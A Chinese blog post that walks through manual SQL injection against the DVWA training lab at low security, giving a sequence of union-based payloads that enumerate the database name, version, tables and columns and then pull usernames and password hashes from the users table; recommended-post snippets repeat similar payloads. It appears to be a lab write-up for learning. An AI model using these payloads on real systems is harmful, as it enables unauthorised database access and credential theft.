DVWA的入侵SQL注入

最新推荐文章于 2023-09-18 13:20:24 发布
最新推荐文章于 2023-09-18 13:20:24 发布
阅读量507 收藏 1
点赞数 1
分类专栏: 渗透测试 网络安全 mysql 文章标签: 安全 sql注入 网络安全 黑客 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39911925/article/details/102812480
版权

DVWA攻击记录 LOW级别 SQL手工注入重现漏洞危害

前言>>>>在攻击开始前,我们至少要具备操作mysql的一些简单语句,否则可能此文章对阅读者的你存在困难,有朋友问这都什么年代了还会存在sql注入?其实做这个的时候是因为昨天我编写代码的时候写出了一个sql注入并且在上线的时候被朋友挖掘了出来,漏洞图如下,就因为我的一次逻辑判断错误而导致,所以今天想起了写一次sql注入的文章。
在这里插入图片描述

1.分析源码
通过源码可以发现他并没有进行任何的参数过滤而是直接的把数据带入数据库进行查询,分析sql查询语句,可能存在字符型sql注入
在这里插入图片描述
2.判读sql是否存在注入,以及注入类型

语句 1'  and ' 1'  = ' 1  进行了字符拼接 
默认语句为: select first_name,last_name from users where user_id=' $id'  
语句为select first_name,last_name from users where user_id=' 1'  and ' 1'  = ' 1

在这里插入图片描述
语句回显正常表示存在sql注入
因为他没有过滤任何字符串我们修改了原有的$id这个变量传入的值,构建成为一个新的语句
3.猜解sql查询语句中的字段数
在这里插入图片描述
回显正常,那么表示他至少有2个字段,继续猜测表段

1'  order by 3#

猜测他这个查询语句里,查询了几个字段
从上面2张图可以看出,这个表提供的可查询字段数为2,order by 他在mysql中起了排序的作用,他可以是指定的字段名或者是字段的第几个,我们在这里选用的通过第几个字段进行排序
4.确定显示的位置(sql语句查询后的回显位置)

1'  union select 1,2#

在这里插入图片描述
5.获取当前数据库的名称以及版本号

1'  union select database(),version()

在这里插入图片描述
可以看到返回的数据库名称是dvwa这个库 数据库版本号为5.5.53
6.获取数据库中的所有表

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema = database()#

在这里插入图片描述
7.获取数据库中的所有字段

1'  union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

在这里插入图片描述
8.获取数据库中字段数据
通过我刚刚获取的字段,进行查询获取密码 这条命令可以获取id为1的账号密码

1' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 union select  user,password from users where user_id =1 #
  1' union select user,password from users where user_id =1 #

在这里插入图片描述
9.攻击总结
有时候手动注入需要注释掉原sql语句的’ 可以通过 – 或者 # (攻击思路)
用户的数据是不可信的,坚信这一点我们就会避免很多被入侵的机会。

码字不易,转载请附带我的原创链接

沫.....啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
DVWASQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
DVWA下的SQL注入
07-25
SQL
【简单工具】BurpSuite密码爆破(暴力破解DVWA low级别下的用户名及密码)
Fighting_hawk的博客
01-29 1万+
1. 了解DVWA靶场的安全级别设置; 2. 掌握请求报文无需验证码的密码爆破; 3. 下一节再补充请求中带有user_token的密码爆破。
DVWA通过攻略之SQL注入
勿山几已
05-24 6842
简单介绍SQL注入,演示手工进行SQL注入及利用sqlmap进行自动化SQL注入
DVWA——SQL注入
qq_62803993的博客
01-08 2373
可以看出,点击“here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制啦查询条数,可以通过burpsuit抓包,修改数据包实现绕过。1.在MYSQL5.0以上版本中存在自带数据库information_schema,他是一个存储所有数据库名,表明,列名的数据库,相当于可以通过查询此库获得相应信息。根据low关卡知道存在SQL注入,这里就不多演示,我们从爆数据库开始。确定显示的位置(SQL语句查询之后的回显位置)
DVWASQL注入
热门推荐
qq_58091216的博客
05-01 1万+
前面没有介绍什么是DVWA,在写SQL注入之前介绍一下什么是DVWA. 一.DVWA介绍 1.1 DVWA简介 DVWA是一款基于PHP和MYSQL开发的web靶场练习平台,集成了常见的web漏洞如sql注入,XSS,密码破解等常见漏洞。旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 1.2 DVWA模块 DVWA共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行...
DVWA-------简单的SQL注入
weixin_53139899的博客
04-17 1万+
DVWA-----SQL注入 提示:以下是本篇文章正文内容,下面案例可供参考 一、实验目的 (1)理解SQL注入的原理; (2)学习手工注入的过程; (3)掌握SQL注入工具的使用; (4)掌握SQL注入的防御技术。 二、实验要求 1、登陆DVWA平台,结合所学SQL注入漏洞的基本知识,爆出MYSQL版本号、安装路径等信息;最终 爆出当前使用的数据库名称、数据表名称、字段名称、以及关键的字段值(比如用户名、密码等)。 2、DVWA安全级别设置为“Low”或者“Medium”,均可。 判断是否存在SQL注入
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
sql注入渗透测试工具:sqlol/DVWA
04-24
sql注入渗透测试工具:sqlol/DVWA https://xianjie0318.blog.csdn.net/article/details/112987555?spm=1001.2014.3001.5502
2020-12-06-DVWA之sql.md
01-24
dvwa之sql
DVWA靶场中SQL注入
剁椒鱼头没剁椒的博客
12-13 5408
但输入-1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=“users”#的时候在2号位显示出很多的列,我们就看其中的user和password。4)联合查询判断可显示的注入点,当输入-1’ union select 1,2# 就能够显示1和2在的位置。2)输入1 and 1=2#正常,但是当输入1’ and 1=2#不正常,那么证明可以判断为字符型注入。
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 4890
SQL注入DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
dvwa——sql注入
GZY0601的博客
09-16 534
Hello!转眼一看距离我上次发文章都是一年前的事情了,中职的第三年都一直备赛的路上,一次比了三个项目,搞得学的好乱,现在上了大学,开始回来复习安全的东西,说实话好久没练了很多基本的东西都忘记了,去年就一直说要写dvwa的教程,现在刚好算是可以边复习边更新。哈哈哈哈哈哈!SQL注入是一种常见的网络安全漏洞和攻击方式,它利用应用程序对用户输入数据的处理不当,使得攻击者能够在执行SQL查询时插入恶意的SQL代码。通过成功注入恶意代码,攻击者可以执行未经授权的数据库操作,获取敏感信息、篡改数据甚至完全破坏数据库。
DVWA-SQL注入
qq_60848021的博客
06-25 1099
显示不同说明存在联合查询,接下来该确定注入类型是数字型还是字符型 判断回显 利用回显获取信息 mysql5以上默认在数据库中存放一个information_schema 的数据库,这个数据库中,需要记住三个表名,分别是SCHEMATA、TABLES和COLUMNS。SCHEMATA表存储用户创建的所有数据库的库名,只要记住该表中的字段 SCHEMA_NAME,这个表中记录了数据库库名。TABLES表存储用户创建的所有数据库 库名和表名,字段分别为: TABLES_SCHEMA和TABLES_NAME。C
DVWA-----SQL Injection(SQL手工注入)
m0_65712192的博客
11-21 5388
DVWA-----SQL Injection(SQL手工注入)
DVWA靶场之SQL注入通关详解
qq_62169455的博客
06-27 2728
获得字段中的数据,使用查询语句:1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #。获取表中的字段名,当输入查询语句(1 union select 1,column_name from information_schema.columns where table_name='users')后,会发现报错了,原因是语句中含有单引号。
DVWASQL注入的步骤
最新发布
XZZbh的博客
09-18 559
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。
dvwa靶场sql注入中级
06-12
DVWA 的 SQL 注入中级靶场中,你需要利用 SQL 注入漏洞来获取数据库中的数据。具体步骤如下: 1. 打开 DVWA 的 SQL 注入中级靶场页面,输入用户名和密码,登录系统。 2. 在页面上找到一个输入框,例如搜索框...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值